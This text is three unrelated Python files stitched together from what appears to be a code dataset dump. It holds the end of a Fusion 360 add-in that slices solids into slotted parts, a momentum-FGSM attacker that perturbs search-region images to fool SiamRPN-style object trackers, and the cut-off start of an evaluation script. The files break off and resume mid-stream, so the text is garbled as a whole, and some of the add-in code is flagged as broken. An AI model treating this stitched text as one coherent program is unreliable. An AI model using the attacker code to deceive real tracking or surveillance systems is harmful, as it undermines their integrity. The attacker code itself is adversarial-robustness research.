    # Account for potential of multiple resulting faces in the slice
    for profile in sketch.profiles:
        # Create the patch feature
        patch_input = patches.createInput(profile, adsk.fusion.FeatureOperations.NewBodyFeatureOperation)
        patch_feature = patches.add(patch_input)
        # Possibly patch could create multiple faces, although unlikely in this application
        # for patch_face in patch_feature.faces:
        patch_face = patch_feature.faces[0]
        # Check if surface is actually in solid
        point = patch_face.pointOnFace
        containment = target_body.pointContainment(point)
        if containment == adsk.fusion.PointContainment.PointInsidePointContainment:
            extrude_profiles.add(profile)
            if is_mid_plane:
                # Keep the patch face alive as the mid-plane slice face.
                mid_slices.append(patch_face)
            else:
                patch_feature.deleteMe()
        else:
            patch_feature.deleteMe()
    return extrude_profiles
def project_all_entities(sketch, entities):
    """Project every entity in ``entities`` onto ``sketch``."""
    for single_entity in entities:
        sketch.project(single_entity)
# Create vertical lines at intersections of two face sets
# Post_Point = namedtuple('Post_Point', ('point', 'body', 'sketch_face', 'line', 'length'))
def make_posts(target_slices: List[SliceFace], intersect_slices: List[SliceFace]):
    """Find the vertical intersection lines ("posts") between two slice sets.

    For each target slice, a construction sketch on its mid face projects the
    cut edges of every intersecting slice body; the resulting non-construction
    lines are the posts. Each post yields a top and a bottom Post_Point,
    classified by comparing the z coordinates of its world-space endpoints.

    Returns:
        tuple: (top_points, bottom_points) lists of Post_Point records.
    """
    top_points = []
    bottom_points = []
    for i, target_slice in enumerate(target_slices):
        sketches = target_slice.face.body.parentComponent.sketches
        post_sketch = add_construction_sketch(sketches, target_slice.face)
        for intersect_slice in intersect_slices:
            post_sketch.projectCutEdges(intersect_slice.face.body)
        lines = post_sketch.sketchCurves.sketchLines
        for line in lines:
            # Pre-existing geometry was marked construction by the helper, so
            # only the freshly projected cut edges pass this filter.
            if not line.isConstruction:
                length = line.length
                start_point = line.startSketchPoint.worldGeometry
                end_point = line.endSketchPoint.worldGeometry
                if start_point.z > end_point.z:
                    top_points.append(Post_Point(start_point, target_slice.body, target_slice.face, line, length))
                    bottom_points.append(Post_Point(end_point, target_slice.body, target_slice.face, line, length))
                else:
                    top_points.append(Post_Point(end_point, target_slice.body, target_slice.face, line, length))
                    bottom_points.append(
                        Post_Point(start_point, target_slice.body, target_slice.face, line, length))
        post_sketch.name = 'Intersection Sketch-' + str(i)
        post_sketch.isVisible = False
    return top_points, bottom_points
def make_slots(target_body: adsk.fusion.BRepBody, post_points: List[Post_Point], thickness: float,
               direction: adsk.core.Vector3D):
    """Cut a centered rectangular slot at each post point.

    Each slot is a rectangle of width ``thickness`` (along ``direction``) and
    height equal to the post length, sketched on the post's slice face and cut
    symmetrically through the post's own body only.

    NOTE(review): ``root_comp`` is unused since the per-body collections below
    superseded it — confirm whether ``target_body`` can be dropped.
    """
    root_comp = target_body.parentComponent
    # Get extrude features
    # extrudes = root_comp.features.extrudeFeatures
    # Create sketch
    # sketches = root_comp.sketches
    for i, post_point in enumerate(post_points):
        sketches = post_point.body.parentComponent.sketches
        extrudes = post_point.body.parentComponent.features.extrudeFeatures
        slot_sketch = add_construction_sketch(sketches, post_point.sketch_face)
        sketch_lines = slot_sketch.sketchCurves.sketchLines
        # Rectangle center: the post point mapped into sketch space, flattened.
        center_point = slot_sketch.modelToSketchSpace(post_point.point)
        center_point.z = 0
        # Half-extents: thickness/2 along the slicing direction, length/2 up.
        x_vector = direction.copy()
        x_vector.scaleBy(thickness / 2)
        y_vector = adsk.core.Vector3D.create(0, 0, 1)
        y_vector.scaleBy(post_point.length / 2)
        # trans_vector = adsk.core.Vector3D.create(post_point.length / 2, thickness / 2, 0)
        corner_point = post_point.point.copy()
        corner_point.translateBy(x_vector)
        corner_point.translateBy(y_vector)
        corner_point_sketch = slot_sketch.modelToSketchSpace(corner_point)
        corner_point_sketch.z = 0
        # corner_point.translateBy(adsk.core.Vector3D.create(post_point.length/2, thickness/2, 0))
        # corner_point_sketch = sketch_points.add(corner_point)
        rectangle_list = sketch_lines.addCenterPointRectangle(center_point, corner_point_sketch)
        # Get the profile defined by the rectangle
        prof = slot_sketch.profiles.item(0)
        thickness_value = adsk.core.ValueInput.createByReal(thickness)
        is_full_length = True
        extrude_input = extrudes.createInput(prof, adsk.fusion.FeatureOperations.CutFeatureOperation)
        extrude_input.setSymmetricExtent(thickness_value, is_full_length)
        # ao = get_app_objects()
        # ao['ui'].messageBox(post_point.body.objectType)
        # Restrict the cut to the post's own body.
        extrude_input.participantBodies = [post_point.body]
        # Create the extrusion
        extrude = extrudes.add(extrude_input)
        slot_sketch.name = 'slot_sketch-' + str(i)
        slot_sketch.isVisible = False
# Make slots from template body
def make_custom_slots(target_body, points, template_bodies):
    """Cut a copy of the template bodies into the model at each point.

    ``points`` items are indexed as ``point[0]`` (a translation point) and
    ``point[1]`` (the body to cut) — presumably (Point3D, BRepBody) pairs;
    TODO confirm with the callers. Zero-length translations are skipped.
    """
    target_component = target_body.parentComponent
    move_feats = target_component.features.moveFeatures
    for point in points:
        translation_vector = adsk.core.Vector3D.create(point[0].x, point[0].y, point[0].z)
        if translation_vector.length > 0:
            new_collection = adsk.core.ObjectCollection.create()
            tool_bodies = []
            # Clone the template bodies so the originals stay reusable.
            for body in template_bodies:
                new_body = body.copyToComponent(target_component)
                new_collection.add(new_body)
                tool_bodies.append(new_body)
            # Move the clones to the post location, then cut them from the body.
            transform_matrix = adsk.core.Matrix3D.create()
            transform_matrix.translation = translation_vector
            move_input = move_feats.createInput(new_collection, transform_matrix)
            move_feats.add(move_input)
            futil.combine_feature(point[1], tool_bodies, adsk.fusion.FeatureOperations.CutFeatureOperation)
# Create components from all bodies
# Should add to utilities
def components_from_bodies(slice_results: List[SliceFace]):
    """Promote each slice body to its own component and collect references.

    FIXME(review): SliceFace is declared with fields ('face', 'body'), but
    this function reads ``slice_result.new_body`` and ``slice_result.end_face``,
    neither of which exists on that namedtuple — as written this raises
    AttributeError. It likely predates the namedtuple refactor; confirm the
    intended field names before using this function.
    """
    component_results = []
    for slice_result in slice_results:
        original_body = slice_result.new_body
        # copied_body = original_body.copyToComponent(original_body.parentComponent)
        output_body = original_body.createComponent()
        # TODO move mid face to component
        component_result = {
            'output_body': output_body,
            'output_component': output_body.parentComponent,
            # 'copied_body': copied_body,
            'mid_face': slice_result.face,
            'end_face': slice_result.end_face
        }
        component_results.append(component_result)
    return component_results
# Direction helper used when laying parts out along an edge.
def get_positive_unit_vector_from_edge(edge):
    """Return the unit direction of ``edge`` mirrored into the positive octant,
    so the result is independent of the edge's drawing direction."""
    (return_value, start_point, end_point) = edge.geometry.evaluator.getEndPoints()
    unit_vector = adsk.core.Vector3D.create(end_point.x - start_point.x,
                                            end_point.y - start_point.y,
                                            end_point.z - start_point.z)
    unit_vector.normalize()
    # Fold each component into positive space.
    unit_vector.x = abs(unit_vector.x)
    unit_vector.y = abs(unit_vector.y)
    unit_vector.z = abs(unit_vector.z)
    return unit_vector
# Extent of a component's bounding box along an arbitrary direction.
def get_bounding_box_extent_in_direction(component, direction_vector):
    """Project the component's bounding-box diagonal onto ``direction_vector``
    and return the resulting scalar extent."""
    box = component.boundingBox
    diagonal = adsk.core.Vector3D.create(box.maxPoint.x - box.minPoint.x,
                                         box.maxPoint.y - box.minPoint.y,
                                         box.maxPoint.z - box.minPoint.z)
    return diagonal.dotProduct(direction_vector)
# Translate an occurrence along a direction by a given amount.
def transform_along_vector(occurrence, directionVector, magnatude):
    """Translate ``occurrence`` by ``magnatude`` along ``directionVector``,
    composing the translation onto its current transform."""
    translation = directionVector.copy()
    translation.scaleBy(magnatude)
    current_transform = adsk.core.Matrix3D.cast(occurrence.transform)
    offset_transform = adsk.core.Matrix3D.create()
    offset_transform.translation = translation
    current_transform.transformBy(offset_transform)
    # Writing the transform back applies the move in the design.
    occurrence.transform = current_transform
# Arranges components on a plane with a given spacing
def arrange_components(component_slices: List[SliceComponent], plane, spacing, direction_vector):
    """Lay the slice components out side-by-side along ``direction_vector``.

    Starting from half the plane's extent in the negative direction, each
    component is translated by the accumulated widths of its predecessors plus
    ``spacing`` between neighbors (components are assumed to start centered at
    the origin — TODO confirm).
    """
    # app = adsk.core.Application.get()
    # ui = app.userInterface
    # product = app.activeProduct
    # design = adsk.fusion.Design.cast(product)
    # Get Placement Direction from Edge
    # direction_vector = get_positive_unit_vector_from_edge(edge)
    # Get extents of stock in placement direction
    delta_plane = get_bounding_box_extent_in_direction(plane, direction_vector)
    # Set initial magnitude
    magnitude = 0.0
    magnitude -= delta_plane / 2
    # Iterate and place components
    for slice_component in component_slices:
        # Get extents of current component in placement direction
        delta = get_bounding_box_extent_in_direction(slice_component.occurrence, direction_vector)
        # ui.messageBox(str(delta))
        # Increment magnitude
        magnitude += spacing
        magnitude += delta / 2
        # Move component in specified direction by half its width
        transform_along_vector(slice_component.occurrence, direction_vector, magnitude)
        # Increment spacing value for next component
        magnitude += delta / 2
class StockSheet:
    """A 100 x 100 stock sheet body extruded to ``thickness``.

    The sheet is created in its own grounded, hidden component under the root;
    the instance exposes the resulting body, component, occurrence and end
    face. Dimensions are in the API's internal units (presumably cm — confirm).

    NOTE(review): ``target_body`` is only referenced by commented-out code and
    is currently unused — confirm whether it can be dropped from the signature.
    """

    def __init__(self, target_body: adsk.fusion.BRepBody, thickness):
        target_comp = get_app_objects()['root_comp']
        new_occurrence = target_comp.occurrences.addNewComponent(adsk.core.Matrix3D.create())
        new_occurrence.activate()
        # Feature Collections
        sketches = new_occurrence.component.sketches
        extrude_features = new_occurrence.component.features.extrudeFeatures
        # Sketch a fixed 100 x 100 rectangle on the XY plane.
        sketch = sketches.add(new_occurrence.component.xYConstructionPlane)
        sketch.sketchCurves.sketchLines.addTwoPointRectangle(sketch.originPoint.geometry,
                                                             adsk.core.Point3D.create(100, 100, 0))
        # Get the profile defined by the rectangle
        profile = sketch.profiles.item(0)
        thickness_value = adsk.core.ValueInput.createByReal(thickness)
        # Create the extrusion
        extrude = extrude_features.addSimple(profile, thickness_value,
                                             adsk.fusion.FeatureOperations.NewBodyFeatureOperation)
        self.body = extrude.bodies[0]                 # the stock sheet solid
        self.new_component = extrude.parentComponent  # component owning the body
        self.occurrence = new_occurrence              # occurrence under the root
        self.end_face = extrude.endFaces[0]           # face at the extrude end
        # self.end_face = extrude.endFaces[0].createForAssemblyContext(self.occurrence)
        # adsk.fusion.Occurrence.cast(target_body).isGrounded = True
        get_app_objects()['design'].activateRootComponent()
        # Ground and hide the sheet so it cannot be moved accidentally.
        new_occurrence.isGrounded = True
        new_occurrence.isLightBulbOn = False
def create_offset_plane(target_comp, distance, base_plane):
    """Add and return a construction plane offset *distance* from *base_plane*."""
    construction_planes = target_comp.constructionPlanes
    # Build the offset-plane definition, then add it to the component.
    offset_input = construction_planes.createInput()
    offset_input.setByOffset(base_plane, adsk.core.ValueInput.createByReal(distance))
    return construction_planes.add(offset_input)
class SlicerDef:
    """State shared between the two slicer commands.

    Builds the hidden X/Y zero reference planes, the slice spacing, and
    (optionally) the stock sheet used to lay the slices flat.
    """
    def __init__(self, target_body=None, num_x=None, num_y=None, thickness=None, lay_this_flat=None):
        if target_body is not None:
            bounding_box = target_body.boundingBox
            target_comp = target_body.parentComponent
            # FIX: this assignment was duplicated; a single copy suffices.
            self.target_body = target_body

            # Hidden construction planes at the body's minimum X/Y extents;
            # slices are offset from these.
            self.x_plane = create_offset_plane(target_comp, bounding_box.minPoint.x, target_comp.yZConstructionPlane)
            self.x_plane.name = 'X_Zero_Plane'
            self.x_plane.isLightBulbOn = False

            self.y_plane = create_offset_plane(target_comp, bounding_box.minPoint.y, target_comp.xZConstructionPlane)
            self.y_plane.name = 'Y_Zero_Plane'
            self.y_plane.isLightBulbOn = False

            # num_x / num_y slices across the body give num+1 equal gaps.
            self.x_spacing = (bounding_box.maxPoint.x - bounding_box.minPoint.x) / (num_x + 1)
            self.y_spacing = (bounding_box.maxPoint.y - bounding_box.minPoint.y) / (num_y + 1)

            # Filled in by FusionSlicerLTCommand.on_execute.
            self.x_component_slices = []
            self.y_component_slices = []

            self.thickness = thickness

            if lay_this_flat:
                self.stock_sheet = StockSheet(target_body, thickness)
            else:
                self.stock_sheet = None
def lay_flat(component_slices: List[SliceComponent], stock_sheet: StockSheet):
    """Joint each slice's end face to the stock sheet so the slices lie flat.

    Each slice receives a planar joint (free to slide within the sheet plane)
    between its end face and the sheet's top face.
    """
    # Get the root component of the active design
    app = adsk.core.Application.get()
    product = app.activeProduct
    design = adsk.fusion.Design.cast(product)

    root_comp = design.rootComponent

    key_type = adsk.fusion.JointKeyPointTypes.CenterKeyPoint

    # Apply Joints
    for slice_component in component_slices:

        face1 = slice_component.end_face
        face2 = stock_sheet.end_face

        # ui = app.userInterface
        # ui.messageBox(face1.objectType)
        # ui.messageBox(face1.body.parentComponent.name)
        # ui.messageBox(face2.objectType)
        # ui.messageBox(face2.body.parentComponent.name)

        # Create the joint geometry
        geo0 = adsk.fusion.JointGeometry.createByPlanarFace(face1, None, key_type)
        geo1 = adsk.fusion.JointGeometry.createByPlanarFace(face2, None, key_type)

        # Create joint input
        joints = root_comp.joints
        joint_input = joints.createInput(geo0, geo1)

        # Planar motion: the slice may still translate within the sheet plane.
        joint_input.setAsPlanarJointMotion(adsk.fusion.JointDirections.ZAxisJointDirection)

        # Create the joint
        joint = joints.add(joint_input)
        # joint.deleteMe()
# Lite version of Fusion 360 Slicer
class FusionSlicerLTCommand(Fusion360CommandBase):
    """Main slicer command: slices the selected body in X and Y and cuts slots.

    Results are stashed in the module-level SLICERDEF so the follow-up
    command (FusionSlicerLTCommand2) can lay the slices flat.
    """
    # Run whenever a user makes any change to a value or selection in the addin UI
    # Commands in here will be run through the Fusion processor and changes will be reflected in Fusion graphics area
    def on_preview(self, command, inputs, args, input_values):
        pass

    # Run when any input is changed.
    # Can be used to check a value and then update the add-in UI accordingly
    def on_input_changed(self, command_, command_inputs, changed_input, input_values):
        pass

    # Run when the user presses OK
    # This is typically where your main program logic would go
    def on_execute(self, command, inputs, args, input_values):
        # Shared with FusionSlicerLTCommand2 via module-level state.
        global SLICERDEF

        # Get a reference to all relevant application objects in a dictionary
        app_objects = get_app_objects()
        ui = app_objects['ui']

        # Get the target body
        target_body = input_values['target_input'][0]

        # Start Feature group
        start_index = futil.start_group()

        SLICERDEF = SlicerDef(target_body, input_values['x_qty'], input_values['y_qty'],
                              input_values['slice_thickness'], input_values['lay_flat'])

        # Make X Slices
        x_component_slices, x_face_slices = create_slices2(target_body, SLICERDEF.x_spacing, input_values['x_qty'],
                                                           SLICERDEF.x_plane, input_values['slice_thickness'],
                                                           'X_Slice')
        # Make Y Slices
        y_component_slices, y_face_slices = create_slices2(target_body, SLICERDEF.y_spacing, input_values['y_qty'],
                                                           SLICERDEF.y_plane, input_values['slice_thickness'],
                                                           'Y_Slice')

        # NOTE(review): hard-coded off; the 'x_template'/'y_template' selection
        # inputs are commented out in on_create, so enabling this branch as-is
        # would raise a KeyError on input_values['x_template'].
        custom_slots = False
        if custom_slots:
            top_points, bottom_points = make_posts(x_face_slices, y_face_slices)
            make_custom_slots(target_body, top_points, input_values['x_template'])

            top_points, bottom_points = make_posts(y_face_slices, x_face_slices)
            make_custom_slots(target_body, bottom_points, input_values['y_template'])
        else:
            # Rectangular slots along Y for X slices and along X for Y slices.
            top_points, bottom_points = make_posts(x_face_slices, y_face_slices)
            make_slots(target_body, top_points, input_values['slice_thickness'],
                       target_body.parentComponent.yConstructionAxis.geometry.direction)

            top_points, bottom_points = make_posts(y_face_slices, x_face_slices)
            make_slots(target_body, bottom_points, input_values['slice_thickness'],
                       target_body.parentComponent.xConstructionAxis.geometry.direction)

        # Make Components
        # SLICERDEF.x_results = components_from_bodies(x_slices)
        # SLICERDEF.y_results = components_from_bodies(x_slices)

        SLICERDEF.x_component_slices = x_component_slices
        SLICERDEF.y_component_slices = y_component_slices

        # Todo needs to be a new command.  Need to do it with tagging

        # End Feature Group
        futil.end_group(start_index)

    def on_destroy(self, command, inputs, reason, input_values):
        # Chain into the lay-flat command once this dialog closes.
        if input_values['lay_flat']:
            app_objects = get_app_objects()
            next_command = app_objects['ui'].commandDefinitions.itemById('cmdID_slicer_lt2')
            next_command.execute()

    # Run when the user selects your command icon from the Fusion 360 UI
    # Typically used to create and display a command dialog box
    # The following is a basic sample of a dialog UI
    def on_create(self, command, command_inputs):
        # Select the bodies
        body_select = command_inputs.addSelectionInput('target_input', 'Select Source Body', 'Select Body')
        body_select.addSelectionFilter('SolidBodies')
        body_select.setSelectionLimits(1, 1)

        # Create a default value using a string
        default_value = adsk.core.ValueInput.createByString('1.0 in')
        default_thk = adsk.core.ValueInput.createByString('.1 in')

        # Create a few inputs in the UI
        command_inputs.addValueInput('slice_thickness', 'Slice Thickness', 'in', default_thk)
        # command_inputs.addValueInput('x_spacing', 'X Spacing Distance', 'in', default_value)
        command_inputs.addIntegerSpinnerCommandInput('x_qty', 'X Quantity', 0, 1000, 1, 1)
        # body_select = command_inputs.addSelectionInput('x_template', 'Select X Template Body', 'Select Body')
        # body_select.addSelectionFilter('SolidBodies')
        # body_select.setSelectionLimits(1, 1)
        # command_inputs.addValueInput('y_spacing', 'Y Spacing Distance', 'in', default_value)
        command_inputs.addIntegerSpinnerCommandInput('y_qty', 'Y Quantity', 0, 1000, 1, 1)
        # body_select = command_inputs.addSelectionInput('y_template', 'Select Y Template Body', 'Select Body')
        # body_select.addSelectionFilter('SolidBodies')
        # body_select.setSelectionLimits(1, 1)
        command_inputs.addBoolValueInput('lay_flat', 'Lay Parts Flat?', True, '', False)
# Lite version of Fusion 360 Slicer
class FusionSlicerLTCommand2(Fusion360CommandBase):
    """Second-stage command: lays the slices created by FusionSlicerLTCommand flat."""

    def on_execute(self, command, inputs, args, input_values):
        # Reads the state stored by the first command.
        global SLICERDEF

        # TODO definitely the problem occurs only when there are joints.
        # Option may be to move only, no joint.
        # Other option may be to delete joints before creating snapshot, althought it doesn't seem to work from API.
        # app = adsk.core.Application.get()
        # product = app.activeProduct
        # design = adsk.fusion.Design.cast(product)
        #
        # root_comp = design.rootComponent
        #
        # joints = root_comp.joints
        #
        # for joint in joints:
        #     joint.deleteMe()

        # Joint every slice to the stock sheet plane.
        lay_flat(SLICERDEF.x_component_slices, SLICERDEF.stock_sheet)
        lay_flat(SLICERDEF.y_component_slices, SLICERDEF.stock_sheet)

        # Spread X slices along +X and Y slices along +Y, 1 cm apart.
        direction_vector = adsk.core.Vector3D.create(1, 0, 0)
        arrange_components(SLICERDEF.x_component_slices, SLICERDEF.stock_sheet.end_face, 1.0, direction_vector)

        direction_vector = adsk.core.Vector3D.create(0, 1, 0)
        arrange_components(SLICERDEF.y_component_slices, SLICERDEF.stock_sheet.end_face, 1.0, direction_vector)

        # design.snapshots.add()
| StarcoderdataPython |
1711803 | <reponame>tsingqguo/AttackTracker
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import torch
import visdom
from pysot.core.config import cfg
import matplotlib.pyplot as plt
from pysot.models.loss import select_cross_entropy_loss
from toolkit.tvnet_pytorch.model.net.spatial_transformer import spatial_transformer as st
from pysot.attacker.oim_attacker import OIMAttacker
class MIFGSMAttacker(OIMAttacker):
    """Momentum Iterative FGSM attacker against SiamRPN-style trackers.

    Generates adversarial perturbations of the tracker's search region so the
    classification branch prefers an attacker-chosen (TA) or shifted (UA) label.
    """

    def __init__(self, type, max_num=10, eplison=1, inta=10, lamb=0.0001, norm_type='Momen', apts_num=2, reg_type='L21', accframes=30):
        # 'UA' (untargeted) or 'TA' (targeted trajectory) attack mode.
        self.type = type
        self.eplison = eplison        # per-step size
        self.inta = inta              # L_inf clamp on the perturbation
        # NOTE(review): norm_type is deliberately overridden to 'Momen'
        # (momentum update) regardless of the argument — confirm intended.
        self.norm_type = 'Momen'  # norm_type
        self.max_num = max_num        # iterations for a full attack
        self.v_id = 0
        # self.st = st()
        self.apts_num = apts_num      # iterations when refining a previous pert
        self.target_traj = []
        self.prev_delta = None
        self.tacc = False             # whether perturbations accumulate over frames
        self.lamb_momen = 1           # momentum decay factor
        self.lamb = 0  # remove the L2,1 regularization
        self.reg_type = reg_type
        self.acc_iters = 0
        self.weight_eplison = 1
        self.accframes = accframes

    def attack(self, tracker, img, prev_perts=None, weights=None, APTS=False, OPTICAL_FLOW=False, ADAPT=False, Enable_same_prev=True):
        """
        args:
            tracker, img(np.ndarray): BGR image
        return:
            (adv_x_crop, pert_true, prev_perts, weights, adv_img)
        """
        # Crop the search region exactly as the tracker does.
        w_z = tracker.size[0] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(tracker.size)
        h_z = tracker.size[1] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(tracker.size)
        s_z = np.sqrt(w_z * h_z)
        scale_z = cfg.TRACK.EXEMPLAR_SIZE / s_z
        s_x = s_z * (cfg.TRACK.INSTANCE_SIZE / cfg.TRACK.EXEMPLAR_SIZE)
        x_crop = tracker.get_subwindow(img, tracker.center_pos,
                                       cfg.TRACK.INSTANCE_SIZE,
                                       round(s_x), tracker.channel_average)

        outputs = tracker.model.track(x_crop)
        cls = tracker.model.log_softmax(outputs['cls'])
        # Binary foreground mask from the positive/negative logit gap.
        diff_cls = cls[:, :, :, :, 1] - cls[:, :, :, :, 0]
        label_cls = diff_cls.ge(0).float()

        # Build the adversarial label for the chosen attack mode.
        if self.type == 'UA':
            adv_cls, same_prev = self.ua_label(tracker, scale_z, outputs)
            adv_cls = adv_cls.long()
        elif self.type == 'TA':
            adv_cls, same_prev = self.ta_label(tracker, scale_z, outputs)
            adv_cls = adv_cls.long()

        max_iteration = self.max_num

        if cfg.CUDA:
            pert = torch.zeros(x_crop.size()).cuda()
        else:
            pert = torch.zeros(x_crop.size())

        if prev_perts is None or (same_prev == False and Enable_same_prev == True):
            # No reusable perturbation: start from scratch.
            if cfg.CUDA:
                prev_perts = torch.zeros(x_crop.size()).cuda()
            else:
                prev_perts = torch.zeros(x_crop.size())
        else:
            if APTS == False:
                # Reuse the accumulated perturbation as-is (no refinement).
                pert_sum = prev_perts.sum(0)
                adv_x_crop = x_crop + pert_sum
                adv_x_crop = torch.clamp(adv_x_crop, 0, 255)
                pert_true = adv_x_crop - x_crop
                if cfg.ATTACKER.GEN_ADV_IMG:
                    adv_img = tracker.get_orgimg(img, x_crop, tracker.center_pos,
                                                 cfg.TRACK.INSTANCE_SIZE,
                                                 round(s_x), tracker.channel_average)
                else:
                    adv_img = None
                # FIX: this early return previously yielded only 4 values while
                # the normal return below yields 5; callers unpacking 5 values
                # crashed on this path.  Include `weights` in the same position.
                return x_crop, pert_true, prev_perts, weights, adv_img
            else:
                # Refine the previous perturbation for a few iterations.
                max_iteration = self.apts_num
                if self.tacc == False:
                    if cfg.CUDA:
                        prev_perts = torch.zeros(x_crop.size()).cuda()
                    else:
                        prev_perts = torch.zeros(x_crop.size())

        if cfg.ATTACKER.SHOW:
            vis = visdom.Visdom(env='Adversarial Example Showing')  # (server='172.28.144.132',port=8022,env='Adversarial Example Showing')
            vis.images(x_crop, win='X_org')
            vis.images(adv_cls.permute(1, 0, 2, 3), win='adv_cls')

        # start attack
        losses = []
        m = 0
        if self.norm_type == 'Momen':
            if cfg.CUDA:
                momen = torch.zeros(x_crop.size()).cuda()
            else:
                momen = torch.zeros(x_crop.size())
        self.acc_iters += max_iteration
        while m < max_iteration:
            if isinstance(tracker.model.zf, list):
                zf = torch.cat(tracker.model.zf, 0)
            else:
                zf = tracker.model.zf
            data = {
                'template_zf': zf.detach(),
                'search': x_crop.detach(),
                'pert': pert.detach(),
                'prev_perts': prev_perts.detach(),
                'label_cls': label_cls.detach(),
                'adv_cls': adv_cls.detach(),
                'momen': momen.detach()
            }
            data['pert'].requires_grad = True
            pert, loss, update_cls, momen = self.oim_once(tracker, data)
            losses.append(loss)
            m += 1
            # disp x_crop for each iteration and the pert
            if cfg.ATTACKER.SHOW:
                x_crop_t = x_crop + prev_perts.sum(0) + pert
                x_crop_t = torch.clamp(x_crop_t, 0, 255)
                vis.images(x_crop_t, win='X_attack')
                vis.images(pert, win='Pert_attack')
                plt.plot(losses)
                plt.ylabel('Loss')
                plt.xlabel('Iteration')
                vis.matplot(plt, win='Loss_attack')
                # validate the score
                # NOTE(review): self.log_softmax is presumably inherited from
                # OIMAttacker — verify, as it is not defined in this class.
                outputs = tracker.model.track(x_crop_t)
                disp_score = self.log_softmax(outputs['cls'].cpu())
                disp_score = disp_score[:, :, :, :, 1].permute(1, 0, 2, 3)
                disp_score_min = torch.min(torch.min(disp_score, 2)[0], 2)[0]
                disp_score_max = torch.max(torch.max(disp_score, 2)[0], 2)[0]
                dispmin = torch.zeros(disp_score.size())
                dispmax = torch.zeros(disp_score.size())
                for i in range(4):
                    dispmin[i, :, :, :] = disp_score_min[i].repeat(1, 1, disp_score.shape[2], disp_score.shape[3])
                    dispmax[i, :, :, :] = disp_score_max[i].repeat(1, 1, disp_score.shape[2], disp_score.shape[3])
                disp_score = (disp_score - dispmin) / (dispmax - dispmin) * 255
                vis.images(disp_score, win='Response_attack')

        self.opt_flow_prev_xcrop = x_crop

        if cfg.CUDA:
            prev_perts = torch.cat((prev_perts, pert), 0).cuda()
        else:
            prev_perts = torch.cat((prev_perts, pert), 0)

        # Final adversarial crop: clamp to valid pixel range and recover the
        # effective (post-clamp) perturbation.
        pert_sum = prev_perts.sum(0)
        adv_x_crop = x_crop + pert_sum
        adv_x_crop = torch.clamp(adv_x_crop, 0, 255)
        pert_true = adv_x_crop - x_crop

        if cfg.ATTACKER.GEN_ADV_IMG:
            adv_img = tracker.get_orgimg(img, x_crop, tracker.center_pos,
                                         cfg.TRACK.INSTANCE_SIZE,
                                         round(s_x), tracker.channel_average)
        else:
            adv_img = None

        return adv_x_crop, pert_true, prev_perts, weights, adv_img

    def oim_once(self, tracker, data):
        """One attack step: backprop the adversarial loss and update the pert.

        Returns (pert, total_loss, cls, momen).
        """
        if cfg.CUDA:
            zf = data['template_zf'].cuda()
            search = data['search'].cuda()
            pert = data['pert'].cuda()
            prev_perts = data['prev_perts'].cuda()
            adv_cls = data['adv_cls'].cuda()
            momen = data['momen'].cuda()
        else:
            zf = data['template_zf']
            search = data['search']
            pert = data['pert']
            prev_perts = data['prev_perts']
            adv_cls = data['adv_cls']
            momen = data['momen']

        track_model = tracker.model

        # Re-split a concatenated multi-level template feature into a list.
        zf_list = []
        if zf.shape[0] > 1:
            for i in range(0, zf.shape[0]):
                zf_list.append(zf[i, :, :, :].resize_(1, zf.shape[1], zf.shape[2], zf.shape[3]))
        else:
            zf_list = zf

        # get feature of the perturbed search region
        xf = track_model.backbone(search + pert + prev_perts.sum(0).view(1, prev_perts.shape[1], prev_perts.shape[2], prev_perts.shape[3]))
        if cfg.ADJUST.ADJUST:
            xf = track_model.neck(xf)
        cls, loc = track_model.rpn_head(zf_list, xf)

        # Adversarial classification loss towards adv_cls.
        cls = track_model.log_softmax(cls)
        cls_loss = select_cross_entropy_loss(cls, adv_cls)

        # Regularization (disabled: self.lamb is 0 in __init__).
        t_prev_perts = prev_perts.view(prev_perts.shape[0] * prev_perts.shape[1], prev_perts.shape[2] * prev_perts.shape[3])
        reg_loss = torch.norm(t_prev_perts, 2, 1).sum() + torch.norm(pert, 2)
        total_loss = cls_loss + self.lamb * reg_loss
        total_loss.backward()

        # Gradient descent on the loss == ascent on adversarial objective.
        x_grad = -data['pert'].grad
        adv_x = search

        if self.norm_type == 'L_inf':
            x_grad = torch.sign(x_grad)
            adv_x = adv_x + pert + self.eplison * x_grad
            pert = adv_x - search
            pert = torch.clamp(pert, -self.inta, self.inta)
        elif self.norm_type == 'L_1':
            x_grad = x_grad / torch.norm(x_grad, 1)
            adv_x = adv_x + pert + self.eplison * x_grad
            pert = adv_x - search
            pert = torch.clamp(pert / np.linalg.norm(pert, 1), -self.inta, self.inta)
        elif self.norm_type == 'L_2':
            x_grad = x_grad / torch.norm(x_grad, 2)
            adv_x = adv_x + pert + self.eplison * x_grad
            pert = adv_x - search
            pert = torch.clamp(pert / np.linalg.norm(pert, 2), -self.inta, self.inta)
        elif self.norm_type == 'Momen':
            # MI-FGSM update: accumulate L1-normalized gradient into momentum,
            # step by the sign of the momentum.
            momen = self.lamb_momen * momen + x_grad / torch.norm(x_grad, 1)
            adv_x = adv_x + pert + self.eplison * torch.sign(momen)
            pert = adv_x - search
            pert = torch.clamp(pert, -self.inta, self.inta)

        # Keep the total perturbed image inside the valid pixel range.
        p_search = search + pert + prev_perts.sum(0)
        p_search = torch.clamp(p_search, 0, 255)
        pert = p_search - search - prev_perts.sum(0)

        return pert, total_loss, cls, momen
62152 | <filename>run_evaluation.py<gh_stars>10-100
import sys
def append_to_pythonpath(paths):
    """Append every entry of *paths* to ``sys.path``."""
    sys.path.extend(paths)
# NOTE(review): hard-coded absolute paths for one developer's checkout;
# consider deriving these from the repository root instead.
append_to_pythonpath(['/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/clustering',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/detectors/mmdetection',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/trackers/iou_tracker',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/evaluation/py_motmetrics',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/feature_extractors/reid-strong-baseline',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/clustering',
                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/detectors/mmdetection',
